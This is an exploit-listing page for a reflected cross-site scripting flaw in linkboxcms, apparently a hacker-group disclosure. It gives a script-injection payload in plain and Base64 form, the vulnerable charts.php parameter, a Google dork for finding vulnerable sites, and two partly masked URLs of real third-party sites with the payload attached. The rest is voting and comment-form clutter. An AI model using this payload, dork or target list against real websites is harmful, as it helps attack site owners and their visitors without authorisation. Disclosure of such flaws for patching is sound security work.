linkboxcms xss vulnerability

2013.08.16

Credit: Iranian_Dark_Coders_Team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

[+] Author: Iranian_Dark_Coders_Team
[+] Home: WwW.IDC-TeaM.NeT
[+] Exploit Title: linkboxcms xss vulnerability
[+] Google Dork: Copy Right &#169; System All Right Reserved By www.MehrdadDesign.Com
[+] Tested on: Ubuntu 12.10
[+] Discovered By : M.R.S.CO

########################################################################################
#IDC

"><script>alert(/xss/)</script> == Base64 Ij48c2NyaXB0PmFsZXJ0KC94c3MvKTwvc2NyaXB0Pg==
Path : http://127.0.0.1/engine/charts_library/charts.php?source=[BASE64]
Path : http://127.0.0.1/engine/charts_library/charts.php?source=Ij48c2NyaXB0PmFsZXJ0KC94c3MvKTwvc2NyaXB0Pg==


for example
http://www.mohsXXnbox.com/1//engine/charts_library/charts.php?source=Ij48c2NyaXB0PmFsZXJ0KC94c3MvKTwvc2NyaXB0Pg==
http://link.anzXXliclub.ir//engine/charts_library/charts.php?source=Ij48c2NyaXB0PmFsZXJ0KC94c3MvKTwvc2NyaXB0Pg==

other in dr.google
#IDC
########################################################################################  

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

linkboxcms xss vulnerability

Dork: Copy Right System All Right Reserved By www.MehrdadDesign.Com

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.